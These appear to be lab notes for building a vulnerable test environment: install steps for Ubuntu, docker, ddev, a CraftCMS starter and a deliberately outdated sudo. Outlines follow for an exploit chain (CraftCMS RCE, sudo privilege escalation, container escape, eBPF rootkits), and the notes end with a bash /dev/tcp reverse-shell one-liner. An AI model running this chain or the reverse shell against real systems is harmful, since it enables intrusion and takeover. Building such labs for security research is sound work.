Installation and setup

The first thing needed is an installation of Ubuntu 24.04.2, which can be installed from https://old-releases.ubuntu.com/releases/24.04.2/. In our case we selected the ubuntu-24.04.2-desktop-amd64.iso image.

Afterwards you need to install docker and ddev into the machine. The installation guide for ddev is at https://docs.ddev.com/en/stable/users/install/ddev-installation/. In any case the commands we used in order to install ddev are the following:

# Add DDEV’s GPG key to your keyring
sudo sh -c 'echo ""'
sudo apt-get update && sudo apt-get install -y curl
sudo install -m 0755 -d /etc/apt/keyrings
curl -fsSL https://pkg.ddev.com/apt/gpg.key | gpg --dearmor | sudo tee /etc/apt/keyrings/ddev.gpg > /dev/null
sudo chmod a+r /etc/apt/keyrings/ddev.gpg

# Add DDEV releases to your package repository
sudo sh -c 'echo ""'
echo "deb [signed-by=/etc/apt/keyrings/ddev.gpg] https://pkg.ddev.com/apt/ * *" | sudo tee /etc/apt/sources.list.d/ddev.list >/dev/null

# Update package information and install DDEV
sudo sh -c 'echo ""'
sudo apt-get update && sudo apt-get install -y ddev

# One-time initialization of mkcert
mkcert -install

In the case of docker the installation guide is at https://docs.docker.com/engine/install/ubuntu/. In our case we used the following commands in order to install docker:

# Add Docker's official GPG key:
sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc

# Add the repository to Apt sources:
sudo tee /etc/apt/sources.list.d/docker.sources <<EOF
Types: deb
URIs: https://download.docker.com/linux/ubuntu
Suites: $(. /etc/os-release && echo "${UBUNTU_CODENAME:-$VERSION_CODENAME}")
Components: stable
Signed-By: /etc/apt/keyrings/docker.asc
EOF

sudo apt update
sudo apt install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

The next thing you need to do is clone the repository for the craft project at https://github.com/craftcms/starter-twig. In our case we use the version at commit 1655611c8a1907dcfcec0ee3af822d773d9e32bc. The project already has an installation guide, but in any case these are the commands we used to install the project are the following:

git clone https://github.com/craftcms/starter-twig.git
cd starter-twig/
git checkout 1655611c8a1907dcfcec0ee3af822d773d9e32bc
ddev start
ddev composer install
ddev craft install

With this you should already have craft working with a site at https://starter-twig.ddev.site/admin. Some parts of the installation of craft will ask you to create an admin and a password. Then we have to manually install sudo 1.9.15 from https://www.sudo.ws/sudo/dist/packages/1.9.15p5/. In our case we used the following commands:

curl https://www.sudo.ws/sudo/dist/packages/1.9.15p5/sudo_1.9.15-6_ubu2204_amd64.deb --output sudo_1.9.15-6_ubu2204_amd64.deb
sudo dpkg -i sudo_1.9.15-6_ubu2204_amd64.deb

Now, we will make Craft accessible over the network interface, in our case using socat as a simple forwarder:

sudo apt install socat
socat tcp-listen:8080,reuseaddr,fork tcp:localhost:32768 # In our case the website is available at port 32768, it might be different in yours.

And with this the setup is complete.

Ubuntu machine setup

• List of releases
• Updating sources

Exploit chain

RCE with CraftCMS (CVE-2025-32432)

• Write-up

• PoC

• Requirements

  • Vulnerable craftcms/cms package (e.g.: 5.6.0)

• Setup

  • DDEV
  • CraftCMS template

LPE with sudo (CVE-2025-32463)

• Write-up

• PoC

• Requirements

  • Vulnerable sudo (1.9.14 <= version < 1.9.17)
  • Use Ubuntu 24.04.2 (24.04.3 does not work for some reason)

Docker container escape

• General techniques

  • https://github.com/cdk-team/CDK
  • https://danger-team.org/container-escape-techniques-breaking-out-of-docker-kubernetes-and-beyond/

• Kernel exploits

  • https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation
  • https://www.crowdstrike.com/en-us/blog/exploiting-cve-2021-3490-for-container-escapes/

Malware

Rootkits

• boopkit
• TripleCross
• Detection methods

eBPF testing

• Initial setup

sudo bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

• Program compilation and loading

clang -target bpf -O2 -g -c probe.c -o probe.o
sudo bpftool prog loadall probe.o /sys/fs/bpf/probe autoattach

• Program debugging output

sudo bpftool prog tracelog

• Map inspection

sudo bpftool map dump name map

• Program removal

sudo rm -r /sys/fs/bpf/probe

Reverse shell

• The bash -c wrapper is required to ensure that /dev/tcp/ syntax is interpreted
• The exec builtin is used reduce the number of processes created

exec bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1234 0>&1'